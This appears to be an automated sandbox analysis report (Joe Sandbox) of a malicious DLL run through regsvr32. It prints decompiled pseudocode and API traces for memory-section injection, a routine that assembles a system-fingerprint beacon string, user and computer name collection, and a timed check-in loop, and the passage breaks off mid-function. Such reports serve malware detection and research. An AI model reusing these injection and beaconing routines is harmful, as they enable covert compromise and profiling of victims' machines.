                • Opcode Fuzzy Hash: d25703a47c19e9ea18ccbd4f7d14cc7c891c21e17007ea382935464015ad2f42
                • Instruction Fuzzy Hash: 29F0FE71910309FBEB05DB95D909BAE77BCEB44345F104048A604AB080EBB8AB04DB75
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,04BD63FB,00000000,?,04BD63FB,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 04BD70CA
                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04BD70D9
                • SetLastError.KERNEL32(00000000,?,04BD63FB,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 04BD70E0
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Error$LastMemoryStatusVirtualWrite
                • String ID:
                • API String ID: 1089604434-0
                • Opcode ID: 5d8c70820243cbf5b4ef930f6869464a9622f0206e18466b66aa68541d166b54
                • Instruction ID: b72f89290ceead8704af01adf310244d62117716d83ce86ed46f7a5b4351ae73
                • Opcode Fuzzy Hash: 5d8c70820243cbf5b4ef930f6869464a9622f0206e18466b66aa68541d166b54
                • Instruction Fuzzy Hash: 64E04F3620021AEBCF015EE9ED04DDB7BADEB4C740B004061BE05D7160EB36DC20ABB0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E031F2F8D(intOrPtr* __eax, void** _a4) {
                				int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				int _v28;
                				int _v32;
                				intOrPtr _v36;
                				int _v40;
                				int _v44;
                				void* _v48;
                				void* __esi;
                				long _t34;
                				void* _t39;
                				void* _t47;
                				intOrPtr* _t48;
                
                				_t48 = __eax;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v24 =  *((intOrPtr*)(__eax + 4));
                				_v16 = 0;
                				_v12 = 0;
                				_v48 = 0x18;
                				_v44 = 0;
                				_v36 = 0x40;
                				_v40 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                				if(_t34 < 0) {
                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                				} else {
                					 *_t48 = _v16;
                					_t39 = E031F4AAF(_t48,  &_v12); // executed
                					_t47 = _t39;
                					if(_t47 != 0) {
                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                					} else {
                						memset(_v12, 0, _v24);
                						 *_a4 = _v12;
                					}
                				}
                				return _t47;
                			}

                Disassembly address column (0x031f2f96-0x031f3032); instruction text not preserved in this extraction

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,031F22B9), ref: 031F2FEA
                  • Part of subcall function 031F4AAF: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,031F2FFF,00000002,00000000,?,?,00000000,?,?,031F2FFF,00000000), ref: 031F4ADC
                • memset.NTDLL ref: 031F300C
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID:
                • API String ID: 2533685722-0
                • Opcode ID: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction ID: a99d4fbb88ff7b972e3e2ee6e91a3ebfec47a59cc7ca602a56b20b401a177891
                • Opcode Fuzzy Hash: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction Fuzzy Hash: 44211DB5D0020DAFDB11DFA9C8849DFFBB9EF48354F10486AE655F7210D7319A448B64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetProcAddress.KERNEL32(?,00000000), ref: 04BCB483
                • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BCE55E,00000000,00000000,00000028,00000100), ref: 04BCB4A5
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressMemory64ProcReadVirtualWow64
                • String ID:
                • API String ID: 752694512-0
                • Opcode ID: 44b40f64b3daa801647c82536ae68b57a3757b59b09d6d4bef6127b08dbfff5e
                • Instruction ID: 883b692db96fcdddce7b075a3db31d0606c17dd316240cde7f1823a4b0b750cc
                • Opcode Fuzzy Hash: 44b40f64b3daa801647c82536ae68b57a3757b59b09d6d4bef6127b08dbfff5e
                • Instruction Fuzzy Hash: DAF04971604109AF9F018F8ADC81C9EBBBAEBC8320B10415AF614CB120D735E951DF20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,04BDBF30,00000000,00000000,04BDBF30,00000000,00000002,00000000,?,?,00000000,04BDBF30,000000FF,00000000), ref: 04BD100E
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                • Instruction ID: fe0930982ff20fca937887a832bbb51e1ae152f62cce98e252f4c679b306bfcf
                • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                • Instruction Fuzzy Hash: 1FF012B690020CFFDB119FA5CC85C9FBBBDEB48344F008869F542D1050E631AE589B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E031F4AAF(void** __esi, PVOID* _a4) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				long _t13;
                
                				_v16 = 0;
                				asm("stosd");
                				_v8 = 0;
                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                				if(_t13 < 0) {
                					_push(_t13);
                					return __esi[6]();
                				}
                				return 0;
                			}

                Disassembly address column (0x031f4ac1-0x031f4ae8); instruction text not preserved in this extraction

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,031F2FFF,00000002,00000000,?,?,00000000,?,?,031F2FFF,00000000), ref: 031F4ADC
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: a663201441a2a90923f5d9fcbb002bfb9dc27d1680e9f3a2306cbd6520d32306
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: 2BF012B990020CBFDB11DFA5CC85C9FBBBDEB48254B104A39B252E1090D6309E488A60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04BEE480), ref: 04BDD6FA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: InformationProcessQuery
                • String ID:
                • API String ID: 1778838933-0
                • Opcode ID: 846705b9d43df1cb78cfdddca531493c46ae0ebd7efa622a67c85c6b4a277c15
                • Instruction ID: 37677cd1b7e9945d766faa3510584c89b428d8e0a11ed7c8fcb56dca366bd8f3
                • Opcode Fuzzy Hash: 846705b9d43df1cb78cfdddca531493c46ae0ebd7efa622a67c85c6b4a277c15
                • Instruction Fuzzy Hash: 65F058353001259BCB20DE59D884DAFBBBCEB42795B4045D5E984EB251E330FD05CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 68%
                			E031F74A5(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                				intOrPtr _v0;
                				intOrPtr _v4;
                				void* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v52;
                				void* __ecx;
                				void* __edi;
                				long _t29;
                				intOrPtr _t30;
                				intOrPtr _t31;
                				intOrPtr _t32;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				void* _t37;
                				intOrPtr _t38;
                				int _t41;
                				void* _t42;
                				intOrPtr _t46;
                				intOrPtr _t47;
                				void* _t50;
                				intOrPtr _t54;
                				intOrPtr _t58;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr _t66;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				intOrPtr _t78;
                				int _t81;
                				intOrPtr _t82;
                				int _t85;
                				intOrPtr _t87;
                				int _t90;
                				intOrPtr _t92;
                				int _t95;
                				intOrPtr* _t97;
                				intOrPtr* _t98;
                				void* _t99;
                				void* _t103;
                				void* _t104;
                				void* _t105;
                				intOrPtr _t106;
                				void* _t108;
                				int _t109;
                				void* _t110;
                				void* _t111;
                				void* _t113;
                				void* _t114;
                				void* _t116;
                
                				_t103 = __edx;
                				_t29 = __eax;
                				_t113 = _a20;
                				_v4 = 8;
                				if(__eax == 0) {
                					_t29 = GetTickCount();
                				}
                				_t30 =  *0x31fa01c; // 0x8e501c47
                				asm("bswap eax");
                				_t31 =  *0x31fa018; // 0x3a87c8cd
                				asm("bswap eax");
                				_t32 =  *0x31fa014; // 0xd8d2f808
                				asm("bswap eax");
                				_t33 =  *0x31fa010; // 0xeec43f25
                				asm("bswap eax");
                				_t34 =  *0x31fa2d8; // 0x240d5a8
                				_t3 = _t34 + 0x31fb633; // 0x74666f73
                				_t109 = wsprintfA(_t113, _t3, 2, 0x3f880, _t33, _t32, _t31, _t30,  *0x31fa030,  *0x31fa008, _t29);
                				_t37 = E031F63D2();
                				_t38 =  *0x31fa2d8; // 0x240d5a8
                				_t4 = _t38 + 0x31fb673; // 0x74707526
                				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                				_t116 = _t114 + 0x38;
                				_t110 = _t109 + _t41;
                				if(_a24 != 0) {
                					_t92 =  *0x31fa2d8; // 0x240d5a8
                					_t8 = _t92 + 0x31fb67e; // 0x732526
                					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t95; // executed
                				}
                				_t42 = E031F4A14(_t99); // executed
                				_t104 = _t42;
                				if(_t104 != 0) {
                					_t87 =  *0x31fa2d8; // 0x240d5a8
                					_t10 = _t87 + 0x31fb8cc; // 0x736e6426
                					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t90;
                					HeapFree( *0x31fa290, 0, _t104);
                				}
                				_t105 = E031F3C13();
                				if(_t105 != 0) {
                					_t82 =  *0x31fa2d8; // 0x240d5a8
                					_t12 = _t82 + 0x31fb8d4; // 0x6f687726
                					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t85;
                					HeapFree( *0x31fa290, 0, _t105);
                				}
                				_t106 =  *0x31fa384; // 0x56095b0
                				_a24 = E031F29DC(0x31fa00e, _t106 + 4);
                				_t46 =  *0x31fa328; // 0x0
                				if(_t46 != 0) {
                					_t78 =  *0x31fa2d8; // 0x240d5a8
                					_t15 = _t78 + 0x31fb8ae; // 0x3d736f26
                					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t81;
                				}
                				_t47 =  *0x31fa324; // 0x0
                				if(_t47 != 0) {
                					_t75 =  *0x31fa2d8; // 0x240d5a8
                					_t17 = _t75 + 0x31fb885; // 0x3d706926
                					wsprintfA(_t110 + _t113, _t17, _t47);
                				}
                				if(_a24 != 0) {
                					_t50 = RtlAllocateHeap( *0x31fa290, 0, 0x800); // executed
                					_t108 = _t50;
                					if(_t108 != 0) {
                						E031F6341(GetTickCount());
                						_t54 =  *0x31fa384; // 0x56095b0
                						__imp__(_t54 + 0x40);
                						asm("lock xadd [eax], ecx");
                						_t58 =  *0x31fa384; // 0x56095b0
                						__imp__(_t58 + 0x40);
                						_t60 =  *0x31fa384; // 0x56095b0
                						_t61 = E031F52C4(1, _t103, _t113,  *_t60); // executed
                						_t111 = _t61;
                						asm("lock xadd [eax], ecx");
                						if(_t111 != 0) {
                							StrTrimA(_t111, 0x31f92a8);
                							_push(_t111);
                							_t66 = E031F5F46();
                							_a12 = _t66;
                							if(_t66 != 0) {
                								_t97 = __imp__;
                								 *_t97(_t111, _v0);
                								 *_t97(_t108, _v4);
                								_t98 = __imp__;
                								 *_t98(_t108, _v0);
                								 *_t98(_t108, _t111);
                								_t72 = E031F6BD0(0xffffffffffffffff, _t108, _v24, _v20); // executed
                								_v52 = _t72;
                								if(_t72 != 0 && _t72 != 0x10d2) {
                									E031F51B1();
                								}
                								HeapFree( *0x31fa290, 0, _v16);
                							}
                							RtlFreeHeap( *0x31fa290, 0, _t111); // executed
                						}
                						RtlFreeHeap( *0x31fa290, 0, _t108); // executed
                					}
                					HeapFree( *0x31fa290, 0, _a16);
                				}
                				RtlFreeHeap( *0x31fa290, 0, _t113); // executed
                				return _a4;
                			}

                APIs
                • GetTickCount.KERNEL32 ref: 031F74BB
                • wsprintfA.USER32 ref: 031F7508
                • wsprintfA.USER32 ref: 031F7525
                • wsprintfA.USER32 ref: 031F7547
                • wsprintfA.USER32 ref: 031F756A
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F757A
                • wsprintfA.USER32 ref: 031F759C
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F75AC
                • wsprintfA.USER32 ref: 031F75E3
                • wsprintfA.USER32 ref: 031F7603
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031F7620
                • GetTickCount.KERNEL32 ref: 031F7630
                • RtlEnterCriticalSection.NTDLL(05609570), ref: 031F7644
                • RtlLeaveCriticalSection.NTDLL(05609570), ref: 031F7662
                  • Part of subcall function 031F52C4: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,031F7675,?,056095B0), ref: 031F52EF
                  • Part of subcall function 031F52C4: lstrlen.KERNEL32(?,?,?,031F7675,?,056095B0), ref: 031F52F7
                  • Part of subcall function 031F52C4: strcpy.NTDLL ref: 031F530E
                  • Part of subcall function 031F52C4: lstrcat.KERNEL32(00000000,?), ref: 031F5319
                  • Part of subcall function 031F52C4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031F7675,?,056095B0), ref: 031F5336
                • StrTrimA.SHLWAPI(00000000,031F92A8,?,056095B0), ref: 031F7694
                  • Part of subcall function 031F5F46: lstrlen.KERNEL32(05609B10,00000000,00000000,7691C740,031F76A0,00000000), ref: 031F5F56
                  • Part of subcall function 031F5F46: lstrlen.KERNEL32(?), ref: 031F5F5E
                  • Part of subcall function 031F5F46: lstrcpy.KERNEL32(00000000,05609B10), ref: 031F5F72
                  • Part of subcall function 031F5F46: lstrcat.KERNEL32(00000000,?), ref: 031F5F7D
                • lstrcpy.KERNEL32(00000000,?), ref: 031F76B3
                • lstrcpy.KERNEL32(00000000,00000000), ref: 031F76BA
                • lstrcat.KERNEL32(00000000,?), ref: 031F76C7
                • lstrcat.KERNEL32(00000000,00000000), ref: 031F76CB
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 031F76FB
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 031F770A
                • RtlFreeHeap.NTDLL(00000000,00000000,?,056095B0), ref: 031F7719
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F772B
                • RtlFreeHeap.NTDLL(00000000,?), ref: 031F773A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                • String ID: Ut
                • API String ID: 628443468-8415677
                • Opcode ID: 5533b1c1465f54acec5314ae82691b8c77dd8a64086782cd80d2eb811f313f99
                • Instruction ID: 0616a21edb368157b263365b0d393092fde72851eaaf71fe5670a5ebf52e5d11
                • Opcode Fuzzy Hash: 5533b1c1465f54acec5314ae82691b8c77dd8a64086782cd80d2eb811f313f99
                • Instruction Fuzzy Hash: C9716872200204AFC719FB64EC88FA677A8FF4C350F190514FA4DD6264DB2AE8959F74
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 83%
                			E031F541F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				void _v48;
                				long _v52;
                				struct %anon52 _v60;
                				char _v72;
                				long _v76;
                				void* _v80;
                				union _LARGE_INTEGER _v84;
                				struct %anon52 _v92;
                				void* _v96;
                				void* _v100;
                				union _LARGE_INTEGER _v104;
                				long _v108;
                				struct %anon52 _v124;
                				long _v128;
                				struct %anon52 _t46;
                				void* _t51;
                				long _t53;
                				void* _t54;
                				struct %anon52 _t61;
                				long _t65;
                				struct %anon52 _t66;
                				intOrPtr _t68;
                				void* _t69;
                				void* _t73;
                				signed int _t74;
                				void* _t76;
                				void* _t78;
                				void** _t82;
                				signed int _t86;
                				void* _t89;
                
                				_t76 = __edx;
                				_v52 = 0;
                				memset( &_v48, 0, 0x2c);
                				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                				_t46 = CreateWaitableTimerA(0, 1, 0);
                				_v60 = _t46;
                				if(_t46 == 0) {
                					_v92.HighPart = GetLastError();
                				} else {
                					_push(0xffffffff);
                					_push(0xff676980);
                					_push(0);
                					_push( *0x31fa298);
                					_v76 = 0;
                					_v80 = 0;
                					L031F807C();
                					_v84.LowPart = _t46;
                					_v80 = _t76;
                					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                					_t51 =  *0x31fa2c4; // 0x2bc
                					_v76 = _t51;
                					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                					_v108 = _t53;
                					if(_t53 == 0) {
                						if(_a8 != 0) {
                							L4:
                							 *0x31fa2a4 = 5;
                						} else {
                							_t69 = E031F5CF6(_t76); // executed
                							if(_t69 != 0) {
                								goto L4;
                							}
                						}
                						_v104.LowPart = 0;
                						L6:
                						L6:
                						if(_v104.LowPart == 1 && ( *0x31fa2b8 & 0x00000001) == 0) {
                							_v104.LowPart = 2;
                						}
                						_t74 = _v104.LowPart;
                						_t58 = _t74 << 4;
                						_t78 = _t89 + (_t74 << 4) + 0x38;
                						_t75 = _t74 + 1;
                						_v92.LowPart = _t74 + 1;
                						_t61 = E031F7253( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                						_v124 = _t61;
                						if(_t61 != 0) {
                							goto L17;
                						}
                						_t66 = _v92;
                						_t97 = _t66 - 3;
                						_v104.LowPart = _t66;
                						if(_t66 != 3) {
                							goto L6;
                						} else {
                							_t68 = E031F611C(_t75, _t97,  &_v72, _a4, _a8); // executed
                							_v124.HighPart = _t68;
                						}
                						goto L12;
                						L17:
                						__eflags = _t61 - 0x10d2;
                						if(_t61 != 0x10d2) {
                							_push(0xffffffff);
                							_push(0xff676980);
                							_push(0);
                							_push( *0x31fa29c);
                							goto L21;
                						} else {
                							__eflags =  *0x31fa2a0; // 0x0
                							if(__eflags == 0) {
                								goto L12;
                							} else {
                								_t61 = E031F51B1();
                								_push(0xffffffff);
                								_push(0xdc3cba00);
                								_push(0);
                								_push( *0x31fa2a0);
                								L21:
                								L031F807C();
                								_v104.LowPart = _t61;
                								_v100 = _t78;
                								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                								__eflags = _t65;
                								_v128 = _t65;
                								if(_t65 == 0) {
                									goto L6;
                								} else {
                									goto L12;
                								}
                							}
                						}
                						L25:
                					}
                					L12:
                					_t82 =  &_v72;
                					_t73 = 3;
                					do {
                						_t54 =  *_t82;
                						if(_t54 != 0) {
                							RtlFreeHeap( *0x31fa290, 0, _t54); // executed
                						}
                						_t82 =  &(_t82[4]);
                						_t73 = _t73 - 1;
                					} while (_t73 != 0);
                					CloseHandle(_v80);
                				}
                				return _v92.HighPart;
                				goto L25;
                			}

                APIs
                • memset.NTDLL ref: 031F5439
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 031F5445
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 031F546D
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 031F548D
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,031F365E,?), ref: 031F54A8
                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,031F365E,?,00000000), ref: 031F554F
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,031F365E,?,00000000,?,?), ref: 031F555F
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 031F5599
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 031F55B3
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 031F55BF
                  • Part of subcall function 031F5CF6: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,056093E0,00000000,?,74E5F710,00000000,74E5F730), ref: 031F5D45
                  • Part of subcall function 031F5CF6: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05609418,?,00000000,30314549,00000014,004F0053,056093D4), ref: 031F5DE2
                  • Part of subcall function 031F5CF6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031F54C0), ref: 031F5DF4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,031F365E,?,00000000,?,?), ref: 031F55D2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID: Ut
                • API String ID: 3521023985-8415677
                • Opcode ID: 1369241b43a494826b0ca86956b7467d84888805c2054b828215beaa2609c7bf
                • Instruction ID: 4878bf6244e030d291e0ed1d4061ae03c4c10d920a10d77b9d8009f576e191a8
                • Opcode Fuzzy Hash: 1369241b43a494826b0ca86956b7467d84888805c2054b828215beaa2609c7bf
                • Instruction Fuzzy Hash: 785168B1508310AFC714EF159C449ABBBEEEF8E364F144A1AFAA9C2190D771C544CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC60C5
                • RtlDeleteCriticalSection.NTDLL(04BEE460), ref: 04BC60F8
                • RtlDeleteCriticalSection.NTDLL(04BEE480), ref: 04BC60FF
                • ReleaseMutex.KERNEL32(000002B4,00000000,?,?,?,04BCE039), ref: 04BC6128
                • CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC6134
                • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BCE039), ref: 04BC6140
                • CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC614C
                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC6152
                • SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC6166
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BCE039), ref: 04BC618A
                • RtlRemoveVectoredExceptionHandler.NTDLL(04C005B8), ref: 04BC61C0
                • SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC61DC
                • CloseHandle.KERNEL32(0624F048,?,?,04BCE039), ref: 04BC6205
                • LocalFree.KERNEL32(?,?,04BCE039), ref: 04BC6215
                  • Part of subcall function 04BC6220: GetVersion.KERNEL32(?,?,74E5F720,?,04BC60B4,00000000,?,?,?,04BCE039), ref: 04BC6244
                  • Part of subcall function 04BC6220: GetModuleHandleA.KERNEL32(?,062497B5,?,74E5F720,?,04BC60B4,00000000,?,?,?,04BCE039), ref: 04BC6261
                  • Part of subcall function 04BC6220: GetProcAddress.KERNEL32(00000000), ref: 04BC6268
                  • Part of subcall function 04BD8E5E: RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8E68
                  • Part of subcall function 04BD8E5E: RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD8EA4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                • String ID:
                • API String ID: 1765366784-0
                • Opcode ID: 48f087547da50a236c1a54d6924c7a1f499df3d180d422d0d6cadacfa738c629
                • Instruction ID: 5c9a2b6d2ce411c2aa7396bcf59676d606c03cb73368db5e0a53e3672a118133
                • Opcode Fuzzy Hash: 48f087547da50a236c1a54d6924c7a1f499df3d180d422d0d6cadacfa738c629
                • Instruction Fuzzy Hash: 81417F31A402119BEB20AF76ECC5F1577A9EB84B45F0500AAF500DF192DB3AFC60CA72
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 251 31f5f8b-31f5f9f 252 31f5fa9-31f5fbb call 31f7452 251->252 253 31f5fa1-31f5fa6 251->253 256 31f600f-31f601c 252->256 257 31f5fbd-31f5fcd GetUserNameW 252->257 253->252 259 31f601e-31f6035 GetComputerNameW 256->259 258 31f5fcf-31f5fdf RtlAllocateHeap 257->258 257->259 258->259 260 31f5fe1-31f5fee GetUserNameW 258->260 261 31f6037-31f6048 RtlAllocateHeap 259->261 262 31f6073-31f6095 259->262 263 31f5ffe-31f600d 260->263 264 31f5ff0-31f5ffc call 31f6576 260->264 261->262 265 31f604a-31f6053 GetComputerNameW 261->265 263->259 264->263 267 31f6055-31f6061 call 31f6576 265->267 268 31f6064-31f6067 265->268 267->268 268->262
                C-Code - Quality: 96%
                			E031F5F8B(char __eax, signed int* __esi) {
                				long _v8;
                				char _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v28;
                				long _t34;
                				signed int _t39;
                				long _t50;
                				char _t59;
                				intOrPtr _t61;
                				void* _t62;
                				void* _t63;
                				signed int* _t64;
                				char _t65;
                				intOrPtr* _t67;
                				void* _t68;
                				signed int* _t69;
                
                				_t69 = __esi;
                				_t65 = __eax;
                				_v8 = 0;
                				_v12 = __eax;
                				if(__eax == 0) {
                					_t59 =  *0x31fa2c8; // 0xd448b889
                					_v12 = _t59;
